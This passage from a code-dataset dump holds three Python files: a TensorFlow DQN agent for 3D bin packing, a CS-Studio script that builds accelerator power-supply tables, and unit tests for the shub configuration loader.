boxes\n s = self.sel_cnn1(s)\n s = 
MaxPooling2D(pool_size=(2, 2))(s)\n s = Flatten()(s)\n s = self.sel_dnn1(s)\n ### size - remain boxes\n r = self.r_cnn1(r)\n r = MaxPooling2D(pool_size=(2, 2))(r)\n r = Flatten()(r)\n r = self.r_dnn1(r)\n ### size - selected boxes\n l = self.l_cnn1(l) #(32, 1, 60, 5)\n l = MaxPooling2D(pool_size=(1, 2))(l)#l = MaxPooling2D(pool_size=(2, 2))(l)\n l = Flatten()(l)\n l = self.l_dnn1(l)\n ### all\n #a = tf.concat([c, r, l], -1)\n #a = self.a_cnn1(a)\n #a = MaxPooling2D(pool_size=(2, 2))(a)\n #a = Flatten()(a)\n #a = self.a_dnn1(a)\n ### merge\n x = concatenate([c,s,r,l])\n x = self.fc1(x)\n x = self.fc2(x)\n q = self.fc_out(x)\n return q \n\nclass DQN_DNN(tf.keras.Model):\n def __init__(self, state_size, selected_size, remain_size, loading_size, output_size):\n super(DQN_DNN, self).__init__()\n # case network\n l1,b1,k1 = state_size # 배치 사이즈 제외된 사이즈\n self.state_size = (l1*b1*k1,)\n self.case_dnn1 = Dense(64, activation='relu',input_shape = self.state_size)\n self.case_dnn2 = Dense(64, activation='relu')#\n # location - selected boxes\n l2,b2,k2 = selected_size\n self.selected_size = (l2*b2*k2,)\n self.sel_dnn1 = Dense(64, activation='relu',input_shape = self.selected_size)\n self.sel_dnn2 = Dense(64, activation='relu')#\n # remain boxes\n l3,b3,k3 = remain_size\n self.remain_size = (l3*b3*k3, )\n self.r_dnn1 = Dense(128, activation='relu', input_shape = self.remain_size )\n self.r_dnn2 = Dense(128, activation='relu')\n # loading boxes - selected boxes\n l4,b4,k4 = loading_size\n self.loading_size = (l4*b4*k4, )\n self.l_dnn1 = Dense(128, activation='relu', input_shape = self.loading_size )\n self.l_dnn2 = Dense(128, activation='relu')\n # all\n #self.all_size = (self.state_size[0]+self.selected_size[0]+self.remain_size[0]+self.loading_size[0], )\n #self.a_dnn1 = Dense(128, activation='relu', input_shape = self.all_size )\n # merge \n self.fc1 = Dense(256, activation='relu')\n self.fc2 = Dense(256, activation='relu')\n self.fc2 = Dense(128, activation='relu')\n self.fc_out = Dense(output_size, activation='softmax')\n if output_size > 1: #DDQN\n self.fc_out = Dense(output_size, activation='softmax')\n else:\n self.fc_out = Dense(output_size)\n\n def call(self, cb_list):\n c, s, r, l = cb_list[0], cb_list[1], cb_list[2], cb_list[3]\n c = tf.reshape(c, [-1, self.state_size[0]])\n s = tf.reshape(s, [-1, self.selected_size[0]])\n r = tf.reshape(r, [-1, self.remain_size[0]])\n l = tf.reshape(l, [-1, self.loading_size[0]])\n #a = tf.concat([c, s, r, l], -1)\n ### case\n c = self.case_dnn1(c)\n c = self.case_dnn2(c)\n ### location - selected boxes\n s = self.sel_dnn1(s)\n s = self.sel_dnn2(s)\n ### remain boxes\n r = self.r_dnn1(r)\n r = self.r_dnn2(r)\n ### loading boxes\n l = self.l_dnn1(l)\n l = self.l_dnn2(l)\n ### all\n #a = self.a_dnn1(a)\n ### merge\n x = concatenate([c,s,r,l])#x = concatenate([c,s,r,l,a])\n x = self.fc1(x)\n x = self.fc2(x)\n q = self.fc_out(x)\n return q\n\n\n\nclass DQNAgent:\n def __init__(self, L=20, B=20, H=20, n_remains = 5, n_loading=3, max_size = 64,\n lr=1e-8, exp_steps=500, train_st = 200, memory_len=500, update_target_rate = 30, net='DNN' ):\n self.state_size = (L, B, 3)\n self.selected_size = (L, B, n_loading)\n self.remain_size = (n_remains, max_size ,2) #(L, B, n_remains)\n self.loading_size = (n_loading, max_size ,2) # (L, B, n_loading)\n self.output_size = 1 #math.factorial(c_boxes_size)\n # hyperparameters\n self.discount_factor = 0.99\n self.learning_rate = lr#1e-8#1e-4\n self.epsilon = 1.\n self.epsilon_start, self.epsilon_end = 1.0, 0.01\n 
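        # Added comment: epsilon is annealed linearly from epsilon_start to
        # epsilon_end over exploration_steps, i.e. each training step subtracts
        # (epsilon_start - epsilon_end) / exploration_steps (computed below).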
self.exploration_steps = exp_steps\n self.epsilon_decay_step = self.epsilon_start - self.epsilon_end\n self.epsilon_decay_step /= self.exploration_steps\n self.batch_size = 32\n self.train_start = train_st\n self.update_target_rate = update_target_rate\n self.beta = 0.2\n self.memory = deque(maxlen=memory_len) # replay memory\n self.net = net\n self.vmin = 0#-0.02\n self.vmax = 1\n self.nsup = 51#52\n self.dz = (self.vmax - self.vmin)/(self.nsup - 1.)\n self.z = np.linspace(self.vmin,self.vmax,self.nsup)\n self.gamma = 0.9\n self.criterion = tf.keras.losses.CategoricalCrossentropy()\n self.dist = False\n # model\n if net == 'DNN':\n self.model = DQN_DNN(self.state_size, self.selected_size, self.remain_size, self.loading_size, self.output_size)\n self.target_model = DQN_DNN(self.state_size, self.selected_size, self.remain_size, self.loading_size, self.output_size)\n elif net =='CNN':\n self.model = DQN_CNN(self.state_size, self.selected_size, self.remain_size, self.loading_size, self.output_size)\n self.target_model = DQN_CNN(self.state_size, self.selected_size, self.remain_size, self.loading_size, self.output_size)\n elif net =='CNNDNN':\n self.model = DQN_CNNDNN(self.state_size, self.selected_size, self.remain_size, self.loading_size, self.output_size)\n self.target_model = DQN_CNNDNN(self.state_size, self.selected_size, self.remain_size, self.loading_size, self.output_size)\n # distributed q learning\n elif net == 'DDQN_DNN':\n self.model = DQN_DNN(self.state_size, self.selected_size, self.remain_size, self.loading_size, self.nsup)\n self.target_model = DQN_DNN(self.state_size, self.selected_size, self.remain_size, self.loading_size, self.nsup)\n elif net == 'DDQN_CNNDNN':\n self.model = DQN_CNNDNN(self.state_size, self.selected_size, self.remain_size, self.loading_size, self.nsup)\n self.target_model = DQN_CNNDNN(self.state_size, self.selected_size, self.remain_size, self.loading_size, self.nsup)\n \n if net in ['DDQN_DNN', 'DDQN_CNNDNN']:\n print('distribution', net)\n self.dist = True\n \n self.optimizer = Adam(self.learning_rate)#, clipnorm=10.)\n # target model (init)\n self.update_target_model()\n self.avg_q_max, self.avg_loss = 0, 0\n self.writer = tf.summary.create_file_writer('summary/bpp')\n self.model_path = os.path.join(os.getcwd(), 'save_model', 'model_3d')\n\n def update_target_model(self):\n self.target_model.set_weights(self.model.get_weights())\n\n def get_action(self, state, loaded_mh_c, r_boxes, loading):\n if np.random.rand() <= self.epsilon:\n random_action = random.randrange(len(state))\n return random_action\n else:\n if self.dist:\n z = self.model.predict([state, loaded_mh_c, r_boxes, loading]) #(C,51)\n z_concat = np.vstack(z) #action output이 여러개 일때\n #q = np.sum(np.multiply(z_concat[:,45:], np.array(self.z)[45:]), axis=1) #(C,)\n q = np.sum(np.multiply(z_concat, np.array(self.z)), axis=1) #(C,)\n self.avg_q_max += np.amax(q)\n return np.argmax(q)\n else:\n q_values=self.model([state, loaded_mh_c, r_boxes, loading])\n armax_idx = np.where( q_values == tf.math.reduce_max(q_values))\n action_idx = armax_idx[0][0]\n return action_idx\n \n \n def append_sample(self, history, load, remain_size, load_size, reward, last, t_history, t_load, t_remain_size, t_load_size):\n self.memory.append(( history, load, remain_size, load_size, reward, last, t_history, t_load, t_remain_size, t_load_size))\n \n \n def draw_tensorboard(self, reward, fill, step, episode):\n with self.writer.as_default():\n tf.summary.scalar('Total Reward/Episode', reward, step=episode)\n 
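            # Added comment: avg_q_max and avg_loss are running sums accumulated
            # over the episode, hence the division by the step count below.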
tf.summary.scalar('Total Fill/Episode', fill, step=episode)\n tf.summary.scalar('Average Max Q/Episode', self.avg_q_max / float(step), step=episode)\n tf.summary.scalar('Duration/Episode', step, step=episode)\n tf.summary.scalar('Average Loss/Episode', self.avg_loss / float(step), step=episode)\n \n def train_model(self):\n \n batch = random.sample(self.memory, self.batch_size)\n \n history = np.array([sample[0] for sample in batch])# (B, 20,20,2)\n load = np.array([sample[1] for sample in batch])# (B, 20,20,1)\n remain_size = np.array([sample[2] for sample in batch]) # (B, 20,20, max_num_remain)\n load_size = np.array([sample[3] for sample in batch]) # (B, 20, 20, K)\n reward = np.array([sample[4] for sample in batch]) # (B,)\n dones = np.array([sample[5] for sample in batch]) # (B,)\n len_t_comb = [ len(sample[6]) for sample in batch ]\n t_history = np.concatenate([sample[6] for sample in batch] )\n t_load = np.concatenate([sample[7] for sample in batch])\n t_remain_size = np.concatenate([sample[8] for sample in batch] )\n t_load_size = np.concatenate([sample[9] for sample in batch] )\n \n #print(history.shape,load.shape,remain_size.shape, load_size.shape, reward.shape, dones.shape, t_history.shape, t_load.shape, t_remain_size.shape, t_load_size.shape)\n \n model_params = self.model.trainable_variables\n with tf.GradientTape() as tape:\n if self.dist:\n # 예측\n predicts = self.model([history, load, remain_size, load_size]) # B,51\n # 타겟\n z_b = []\n for i in range(0,len(t_history), self.batch_size ):\n e_idx = min( i + self.batch_size, len(t_history) )\n z = self.target_model([t_history[i:e_idx], t_load[i:e_idx], t_remain_size[i:e_idx], t_load_size[i:e_idx]]) #(C, 51)\n z_b.append(z)\n z_concat = np.vstack(z_b) #(B*c, 51)\n t_q = np.sum(np.multiply(z_concat, np.array(self.z)), axis=1) #(B*c, )\n # 가장 기댓값이 높은 action 선택\n next_actions, probs = [],[]\n for i in range(len(len_t_comb)):\n s_idx = np.sum(len_t_comb[:i]).astype('int')\n n_a = np.argmax(t_q[s_idx: s_idx + len_t_comb[i]])\n next_actions.append(n_a) #[32]\n probs.append((z_concat[s_idx: s_idx + len_t_comb[i]])[n_a])\n probs = np.stack(probs) #(B, 51)\n # target distribution\n bj = np.round((reward - self.vmin)/self.dz) #(B,)\n #지지 성분의 색인\n bj = np.clip(bj, 0, self.nsup-1).astype('int') #유효한 범위\n targets = []\n for i in range(self.batch_size):\n if dones[i]:\n target_dist = np.zeros(self.nsup)\n target_dist[bj[i]] = 1\n targets.append(target_dist)\n else:\n m = probs[i].copy() #(51,)\n j = 1\n for i in range(bj[i],1,-1):\n m[i] += np.power(self.gamma, j) * m[i-1]\n j += 1\n j = 1\n for i in range(bj[i], self.nsup-1,1):\n m[i] += np.power(self.gamma, j) * m[i+1]\n j += 1\n m /= m.sum() #(51,)\n targets.append(m)\n loss = self.criterion(targets, predicts)\n else: \n # 예측\n predicts = self.model([history, load, remain_size, load_size]) #(B, 1)\n # 타겟\n targets = []\n for i in range(self.batch_size):\n t_q = self.target_model([t_history[i], t_load[i], t_remain_size[i], t_load_size[i]]) # target q value\n t_max_q = tf.math.reduce_max(t_q)\n targets.append([(1- 0.75)*reward[i] + (1 - dones[i]) *0.75*t_max_q])\n targets=np.array(targets) #(B, 1)\n # loss 계산\n #loss = tf.reduce_mean(tf.square(targets - predicts))\n error = tf.abs(targets - predicts)\n quadratic_part = tf.clip_by_value(error, 0.0, 1.0)\n linear_part = error - quadratic_part\n loss = tf.reduce_mean(0.5 * tf.square(quadratic_part) + linear_part)\n \n self.avg_loss += loss.numpy()\n \n # update\n grads = tape.gradient(loss, model_params)\n 
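        # Added, hedged note: the Adam clipnorm above is commented out; if training
        # diverges, global-norm clipping could be applied here instead, e.g.:
        #   grads, _ = tf.clip_by_global_norm(grads, 10.0)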
self.optimizer.apply_gradients(zip(grads, model_params))\n \n\n\n \n \n \n","sub_path":"3DBPP/ActorCritic/box_dqn/libs/dqn.py","file_name":"dqn.py","file_ext":"py","file_size_in_byte":15555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"126574524","text":"from org.csstudio.opibuilder.scriptUtil import PVUtil, WidgetUtil, DataUtil\n\ndef get_power_supply_list(family):\n if family == 'QFA':\n power_supplies = [\n \"QFA-01M2\", \"QFA-02M2\", \"QFA-03M2\", \"QFA-04M2\", \"QFA-05M2\", \n \"QFA-06M2\", \"QFA-07M2\", \"QFA-08M2\", \"QFA-09M2\", \"QFA-10M2\", \n \"QFA-11M2\", \"QFA-12M2\", \"QFA-13M2\", \"QFA-14M2\", \"QFA-15M2\", \n \"QFA-16M2\", \"QFA-17M2\", \"QFA-18M2\", \"QFA-19M2\", \"QFA-20M2\", \n ]\n \n elif family == 'QDA':\n power_supplies = [\n \"QDA-01M2\", \"QDA-02M2\", \"QDA-03M2\", \"QDA-04M2\", \"QDA-05M2\", \n \"QDA-06M2\", \"QDA-07M2\", \"QDA-08M2\", \"QDA-09M2\", \"QDA-10M2\", \n \"QDA-11M2\", \"QDA-12M2\", \"QDA-13M2\", \"QDA-14M2\", \"QDA-15M2\", \n \"QDA-16M2\", \"QDA-17M2\", \"QDA-18M2\", \"QDA-19M2\", \"QDA-20M2\", \n ]\n \n elif family == 'QF1':\n power_supplies = [\n \"QF1-01C1\", \"QF1-01C4\", \"QF1-02C1\", \"QF1-02C4\", \"QF1-03C1\", \n \"QF1-03C4\", \"QF1-04C1\", \"QF1-04C4\", \"QF1-05C1\", \"QF1-05C4\", \n \"QF1-06C1\", \"QF1-06C4\", \"QF1-07C1\", \"QF1-07C4\", \"QF1-08C1\", \n \"QF1-08C4\", \"QF1-09C1\", \"QF1-09C4\", \"QF1-10C1\", \"QF1-10C4\", \n \"QF1-11C1\", \"QF1-11C4\", \"QF1-12C1\", \"QF1-12C4\", \"QF1-13C1\", \n \"QF1-13C4\", \"QF1-14C1\", \"QF1-14C4\", \"QF1-15C1\", \"QF1-15C4\", \n \"QF1-16C1\", \"QF1-16C4\", \"QF1-17C1\", \"QF1-17C4\", \"QF1-18C1\", \n \"QF1-18C4\", \"QF1-19C1\", \"QF1-19C4\", \"QF1-20C1\", \"QF1-20C4\", \n ]\n \n elif family == 'QF2':\n power_supplies = [\n \"QF2-01C1\", \"QF2-01C4\", \"QF2-02C1\", \"QF2-02C4\", \"QF2-03C1\", \n \"QF2-03C4\", \"QF2-04C1\", \"QF2-04C4\", \"QF2-05C1\", \"QF2-05C4\", \n \"QF2-06C1\", \"QF2-06C4\", \"QF2-07C1\", \"QF2-07C4\", \"QF2-08C1\", \n \"QF2-08C4\", \"QF2-09C1\", \"QF2-09C4\", \"QF2-10C1\", \"QF2-10C4\", \n \"QF2-11C1\", \"QF2-11C4\", \"QF2-12C1\", \"QF2-12C4\", \"QF2-13C1\", \n \"QF2-13C4\", \"QF2-14C1\", \"QF2-14C4\", \"QF2-15C1\", \"QF2-15C4\", \n \"QF2-16C1\", \"QF2-16C4\", \"QF2-17C1\", \"QF2-17C4\", \"QF2-18C1\", \n \"QF2-18C4\", \"QF2-19C1\", \"QF2-19C4\", \"QF2-20C1\", \"QF2-20C4\", \n ]\n \n elif family == 'QF3':\n power_supplies = [\n \"QF3-01C2\", \"QF3-01C3\", \"QF3-02C2\", \"QF3-02C3\", \"QF3-03C2\", \n \"QF3-03C3\", \"QF3-04C2\", \"QF3-04C3\", \"QF3-05C2\", \"QF3-05C3\", \n \"QF3-06C2\", \"QF3-06C3\", \"QF3-07C2\", \"QF3-07C3\", \"QF3-08C2\", \n \"QF3-08C3\", \"QF3-09C2\", \"QF3-09C3\", \"QF3-10C2\", \"QF3-10C3\", \n \"QF3-11C2\", \"QF3-11C3\", \"QF3-12C2\", \"QF3-12C3\", \"QF3-13C2\", \n \"QF3-13C3\", \"QF3-14C2\", \"QF3-14C3\", \"QF3-15C2\", \"QF3-15C3\", \n \"QF3-16C2\", \"QF3-16C3\", \"QF3-17C2\", \"QF3-17C3\", \"QF3-18C2\", \n \"QF3-18C3\", \"QF3-19C2\", \"QF3-19C3\", \"QF3-20C2\", \"QF3-20C3\", \n ]\n \n elif family == 'QF4':\n power_supplies = [\n \"QF4-01C2\", \"QF4-01C3\", \"QF4-02C2\", \"QF4-02C3\", \"QF4-03C2\", \n \"QF4-03C3\", \"QF4-04C2\", \"QF4-04C3\", \"QF4-05C2\", \"QF4-05C3\", \n \"QF4-06C2\", \"QF4-06C3\", \"QF4-07C2\", \"QF4-07C3\", \"QF4-08C2\", \n \"QF4-08C3\", \"QF4-09C2\", \"QF4-09C3\", \"QF4-10C2\", \"QF4-10C3\", \n \"QF4-11C2\", \"QF4-11C3\", \"QF4-12C2\", \"QF4-12C3\", \"QF4-13C2\", \n \"QF4-13C3\", \"QF4-14C2\", \"QF4-14C3\", \"QF4-15C2\", \"QF4-15C3\", \n \"QF4-16C2\", \"QF4-16C3\", \"QF4-17C2\", 
\"QF4-17C3\", \"QF4-18C2\", \n \"QF4-18C3\", \"QF4-19C2\", \"QF4-19C3\", \"QF4-20C2\", \"QF4-20C3\", \n ]\n \n elif family == 'QDB1':\n power_supplies = [\n \"QDB1-01M1\", \"QDB1-02M1\", \"QDB1-03M1\", \"QDB1-04M1\", \"QDB1-05M1\", \n \"QDB1-06M1\", \"QDB1-07M1\", \"QDB1-08M1\", \"QDB1-09M1\", \"QDB1-10M1\", \n \"QDB1-11M1\", \"QDB1-12M1\", \"QDB1-13M1\", \"QDB1-14M1\", \"QDB1-15M1\", \n \"QDB1-16M1\", \"QDB1-17M1\", \"QDB1-18M1\", \"QDB1-19M1\", \"QDB1-20M1\", \n ]\n \n elif family == 'QFB':\n power_supplies = [\n \"QFB-01M1\", \"QFB-02M1\", \"QFB-03M1\", \"QFB-04M1\", \"QFB-05M1\", \n \"QFB-06M1\", \"QFB-07M1\", \"QFB-08M1\", \"QFB-09M1\", \"QFB-10M1\", \n \"QFB-11M1\", \"QFB-12M1\", \"QFB-13M1\", \"QFB-14M1\", \"QFB-15M1\", \n \"QFB-16M1\", \"QFB-17M1\", \"QFB-18M1\", \"QFB-19M1\", \"QFB-20M1\", \n ]\n \n elif family == 'QDB2':\n power_supplies = [\n \"QDB2-01M1\", \"QDB2-02M1\", \"QDB2-03M1\", \"QDB2-04M1\", \"QDB2-05M1\", \n \"QDB2-06M1\", \"QDB2-07M1\", \"QDB2-08M1\", \"QDB2-09M1\", \"QDB2-10M1\", \n \"QDB2-11M1\", \"QDB2-12M1\", \"QDB2-13M1\", \"QDB2-14M1\", \"QDB2-15M1\", \n \"QDB2-16M1\", \"QDB2-17M1\", \"QDB2-18M1\", \"QDB2-19M1\", \"QDB2-20M1\", \n ]\n else:\n power_supplies = None\n \n return power_supplies\n\n\ndef add_header(table, header_opi):\n linkingContainer = WidgetUtil.createWidgetModel(\"org.csstudio.opibuilder.widgets.linkingContainer\") \n linkingContainer.setPropertyValue(\"opi_file\", header_opi)\n linkingContainer.setPropertyValue(\"resize_behaviour\", 1)\n linkingContainer.setPropertyValue(\"border_style\", 0)\n table.addChildToBottom(linkingContainer)\n\n\ndef add_line(table, line_opi, power_supply):\n linkingContainer = WidgetUtil.createWidgetModel(\"org.csstudio.opibuilder.widgets.linkingContainer\") \n linkingContainer.setPropertyValue(\"opi_file\", line_opi)\n linkingContainer.setPropertyValue(\"resize_behaviour\", 1)\n linkingContainer.setPropertyValue(\"border_style\", 0)\n table.addChildToBottom(linkingContainer)\n \n children = linkingContainer.getChildren()\n for w in children:\n if w.getPropertyValue(\"widget_type\") == \"Action Button\":\n button = w\n elif w.getPropertyValue(\"widget_type\") == \"Spinner\":\n spinner = w\n elif w.getPropertyValue(\"widget_type\") == \"Text Update\":\n text_update = w\n elif w.getPropertyValue(\"widget_type\") == \"Grouping Container\":\n container = w\n led = container.getChildren()[0] \n\n setpoint = subsystem + power_supply.upper() + '-SP'\n readback = subsystem + power_supply.upper() + '-RB'\n \n button.setPropertyValue(\"text\", power_supply)\n spinner.setPropertyValue(\"pv_name\", setpoint)\n text_update.setPropertyValue(\"pv_name\", readback)\n led.setPropertyValue(\"pv_name\", '$(power_supply_status)')\n \n macro_inputs = DataUtil.createMacrosInput(True)\n macro_inputs.put(\"power_supply\", power_supply)\n macro_inputs.put(\"power_supply_sp\", setpoint)\n macro_inputs.put(\"power_supply_rb\", readback)\n macro_inputs.put(\"power_supply_start\", 'sim://const(\"quadrupole\")')\n linkingContainer.setPropertyValue(\"macros\", macro_inputs)\n \n\nsubsystem = \"SIPS-\"\nfamily = PVUtil.getString(pvs[0]).upper()\npower_supplies = get_power_supply_list(family)\nheader_opi = \"table/table_header.opi\"\nline_opi = \"table/table_line.opi\"\n\ntable_container = display.getWidget(\"table_container\")\nfam_table = display.getWidget(\"fam_table\")\nshunt_table_1 = display.getWidget(\"shunt_table_1\")\nshunt_table_2 = 
display.getWidget(\"shunt_table_2\")\n\nfam_table.removeAllChildren()\nshunt_table_1.removeAllChildren()\nshunt_table_2.removeAllChildren()\n \nif power_supplies is None:\n table_container.setPropertyValue(\"visible\", False)\n \nelse: \n # create table for family power supply\n add_header(fam_table, header_opi)\n power_supply = family.upper() + '-FAM'\n add_line(fam_table, line_opi, power_supply)\n \n # create table for shunt power supply\n length = len(power_supplies)\n table_len = 20\n table = shunt_table_1\n add_header(table, header_opi) \n for i in range(1,length+1):\n power_supply = power_supplies[i-1]\n add_line(table, line_opi, power_supply) \n if i == table_len and length > table_len: \n table = shunt_table_2\n add_header(table, header_opi) \n\n fam_table.performAutosize() \n shunt_table_1.performAutosize()\n shunt_table_2.performAutosize() \n table_container.setPropertyValue(\"visible\", True)\n","sub_path":"sirius/opi/si_power_supplies/table/write_quad_table.py","file_name":"write_quad_table.py","file_ext":"py","file_size_in_byte":8111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"21290","text":"import os\nimport shutil\nimport StringIO\nimport tempfile\nimport textwrap\nimport unittest\nimport ruamel.yaml as yaml\n\nimport mock\n\nfrom click.testing import CliRunner\n\nfrom shub.config import (get_target, get_version, load_shub_config, ShubConfig,\n update_yaml_dict)\nfrom shub.exceptions import (BadParameterException, BadConfigException,\n ConfigParseException, MissingAuthException,\n NotFoundException)\n\n\nVALID_YAML_CFG = \"\"\"\n projects:\n shproj: 123\n externalproj: external/123\n notmeproj: otheruser/123\n invalid: 50a\n invalid2: 123/external\n endpoints:\n external: ext_endpoint\n apikeys:\n default: key\n otheruser: otherkey\n\"\"\"\n\n\nclass ShubConfigTest(unittest.TestCase):\n\n def _get_conf_with_yml(self, yml):\n conf = ShubConfig()\n conf.load(StringIO.StringIO(textwrap.dedent(yml)))\n return conf\n\n def setUp(self):\n self.conf = self._get_conf_with_yml(VALID_YAML_CFG)\n\n def test_init_sets_default(self):\n conf = ShubConfig()\n self.assertIn('default', conf.endpoints)\n self.assertEqual(conf.version, 'AUTO')\n\n def test_load(self):\n projects = {\n 'shproj': 123,\n 'externalproj': 'external/123',\n 'notmeproj': 'otheruser/123',\n 'invalid': '50a',\n 'invalid2': '123/external',\n }\n self.assertEqual(projects, self.conf.projects)\n endpoints = {'external': 'ext_endpoint'}\n self.assertDictContainsSubset(endpoints, self.conf.endpoints)\n apikeys = {'default': 'key', 'otheruser': 'otherkey'}\n self.assertEqual(apikeys, self.conf.apikeys)\n\n def test_load_partial(self):\n yml = \"\"\"\n endpoints:\n external: ext_endpoint\n extra:\n not related to ShubConfig\n \"\"\"\n conf = self._get_conf_with_yml(yml)\n endpoints = {'external': 'ext_endpoint'}\n self.assertDictContainsSubset(endpoints, conf.endpoints)\n self.assertEqual(conf.projects, {})\n self.assertEqual(conf.apikeys, {})\n # Assert no exception raised on empty file\n conf = self._get_conf_with_yml(\"\")\n\n def test_load_malformed(self):\n # Invalid YAML\n yml = \"\"\"\n endpoints\n external: ext_endpoint\n apikeys:\n default: key\n \"\"\"\n with self.assertRaises(ConfigParseException):\n self._get_conf_with_yml(yml)\n # Valid YAML but not dictionary-like\n yml = \"\"\"\n endpoints\n external: ext_endpoint\n \"\"\"\n with self.assertRaises(ConfigParseException):\n self._get_conf_with_yml(yml)\n\n def test_load_file(self):\n tmpdir = 
tempfile.mkdtemp()\n tmpfilepath = os.path.join(tmpdir, 'scrapinghub.yml')\n with open(tmpfilepath, 'w') as f:\n f.write(textwrap.dedent(\n \"\"\"\n apikeys:\n external: ext_endpoint\n \"\"\"\n ))\n conf = ShubConfig()\n conf.load_file(tmpfilepath)\n shutil.rmtree(tmpdir)\n self.assertEqual({'external': 'ext_endpoint'}, conf.apikeys)\n\n def test_load_scrapycfg(self):\n tmpdir = tempfile.mkdtemp()\n tmpfilepath = os.path.join(tmpdir, 'scrapy.cfg')\n\n def _get_conf(scrapycfg_default_target):\n with open(tmpfilepath, 'w') as f:\n f.write(textwrap.dedent(scrapycfg_default_target))\n f.write(textwrap.dedent(\n \"\"\"\n [deploy:prod]\n project = 222\n\n [deploy:otheruser]\n project = 333\n username = otherkey\n\n [deploy:otherurl]\n project = 444\n url = http://dash.scrapinghub.com/api/scrapyd/\n\n [deploy:external]\n project = 555\n url = external_endpoint\n username = externalkey\n \"\"\"\n ))\n conf = ShubConfig()\n conf.load_scrapycfg([tmpfilepath])\n return conf\n\n expected_projects = {\n 'prod': '222',\n 'otheruser': 'otheruser/333',\n 'otherurl': 'otherurl/444',\n 'external': 'external/555',\n }\n expected_endpoints = {\n 'default': ShubConfig.DEFAULT_ENDPOINT,\n 'external': 'external_endpoint',\n 'otherurl': 'http://dash.scrapinghub.com/api/'\n }\n expected_apikeys = {\n 'otheruser': 'otherkey',\n 'external': 'externalkey',\n }\n\n # Default with project\n conf = _get_conf(\n \"\"\"\n [deploy]\n project = 111\n \"\"\"\n )\n expected_projects['default'] = '111'\n self.assertEqual(conf.projects, expected_projects)\n self.assertEqual(conf.endpoints, expected_endpoints)\n self.assertEqual(conf.apikeys, expected_apikeys)\n\n # Default with URL\n conf = _get_conf(\n \"\"\"\n [deploy]\n url = http://default_url\n \"\"\"\n )\n del expected_projects['default']\n expected_endpoints['default'] = 'http://default_url'\n self.assertEqual(conf.projects, expected_projects)\n self.assertEqual(conf.endpoints, expected_endpoints)\n self.assertEqual(conf.apikeys, expected_apikeys)\n\n # Default with key\n conf = _get_conf(\n \"\"\"\n [deploy]\n username = key\n \"\"\"\n )\n expected_endpoints['default'] = ShubConfig.DEFAULT_ENDPOINT\n expected_apikeys['default'] = 'key'\n expected_apikeys['otherurl'] = 'key'\n self.assertEqual(conf.projects, expected_projects)\n self.assertEqual(conf.endpoints, expected_endpoints)\n self.assertEqual(conf.apikeys, expected_apikeys)\n\n shutil.rmtree(tmpdir)\n\n def test_save(self):\n tmpdir = tempfile.mkdtemp()\n tmpfilepath = os.path.join(tmpdir, 'saved_conf.yml')\n self.conf.save(tmpfilepath)\n with open(tmpfilepath, 'r') as f:\n self.assertEqual(yaml.load(f), yaml.load(VALID_YAML_CFG))\n shutil.rmtree(tmpdir)\n\n def test_get_target(self):\n with self.assertRaises(MissingAuthException):\n self.conf.get_target('externalproj')\n self.assertEqual(\n self.conf.get_target('externalproj', auth_required=False),\n (123, 'ext_endpoint', None)\n )\n self.assertEqual(\n self.conf.get_target('shproj', auth_required=True),\n self.conf.get_target('shproj', auth_required=False),\n )\n\n def test_get_undefined(self):\n self.assertEqual(\n self.conf.get_target('99'),\n (99, self.conf.endpoints['default'], 'key'),\n )\n self.assertEqual(\n self.conf.get_target('external/99', auth_required=False),\n (99, 'ext_endpoint', None),\n )\n\n def test_get_invalid(self):\n # Missing target and no default defined\n with self.assertRaises(BadParameterException):\n self.conf.get_target('default')\n # Bad project ID on command line\n with self.assertRaises(BadParameterException):\n 
self.conf.get_target('99a')\n # Bad project ID in scrapinghub.yml\n with self.assertRaises(BadConfigException):\n self.conf.get_target('invalid')\n with self.assertRaises(BadConfigException):\n self.conf.get_target('invalid2')\n\n def test_get_project_id(self):\n self.assertEqual(self.conf.get_project_id('shproj'), 123)\n self.assertEqual(self.conf.get_project_id('externalproj'), 123)\n self.assertEqual(self.conf.get_project_id('notmeproj'), 123)\n\n def test_get_endpoint(self):\n self.assertEqual(\n self.conf.get_endpoint('shproj'),\n ShubConfig.DEFAULT_ENDPOINT,\n )\n self.assertEqual(\n self.conf.get_endpoint('externalproj'),\n 'ext_endpoint',\n )\n self.assertEqual(\n self.conf.get_endpoint('notmeproj'),\n ShubConfig.DEFAULT_ENDPOINT,\n )\n with self.assertRaises(NotFoundException):\n self.conf.get_endpoint('nonexisting_ep/33')\n\n def test_get_apikey(self):\n self.assertEqual(self.conf.get_apikey('shproj'), 'key')\n self.assertEqual(self.conf.get_apikey('notmeproj'), 'otherkey')\n with self.assertRaises(MissingAuthException):\n self.conf.get_apikey('externalproj', required=True)\n self.assertEqual(\n self.conf.get_apikey('externalproj', required=False),\n None,\n )\n # API keys should always be strings, even if they contain only digits\n self.conf.apikeys['default'] = 123\n self.assertEqual(self.conf.get_apikey('shproj'), '123')\n\n @mock.patch('shub.config.pwd_version', return_value='ver_AUTO')\n @mock.patch('shub.config.pwd_git_version', return_value='ver_GIT')\n @mock.patch('shub.config.pwd_hg_version', return_value='ver_HG')\n def test_get_version(self, mock_hg, mock_git, mock_ver):\n def _assert_version(version, expected):\n self.conf.version = version\n self.assertEqual(self.conf.get_version(), expected)\n _assert_version('GIT', 'ver_GIT')\n _assert_version('HG', 'ver_HG')\n _assert_version('somestring', 'somestring')\n _assert_version('', 'ver_AUTO')\n _assert_version('AUTO', 'ver_AUTO')\n\n\nLOCAL_SCRAPINGHUB_YML = \"\"\"\n projects:\n localextproj: external/123\n endpoints:\n external: local_ext_endpoint\n apikeys:\n external: key_ext\n\"\"\"\n\nGLOBAL_SCRAPY_CFG = textwrap.dedent(\"\"\"\n [deploy]\n url = dotsc_endpoint\n username = dotsc_key\n\n [deploy:ext2]\n url = ext2_endpoint\n project = 333\n username = ext2_key\n\"\"\")\n\nNETRC = 'machine scrapinghub.com login netrc_key password \"\"'\n\n\nclass LoadShubConfigTest(unittest.TestCase):\n\n def setUp(self):\n self.tmpdir = tempfile.mkdtemp()\n self.globalpath = os.path.join(self.tmpdir, '.scrapinghub.yml')\n self.localpath = os.path.join(self.tmpdir, 'scrapinghub.yml')\n self.globalscrapycfgpath = os.path.join(self.tmpdir, '.scrapy.cfg')\n self.localscrapycfgpath = os.path.join(self.tmpdir, 'scrapy.cfg')\n self.netrcpath = 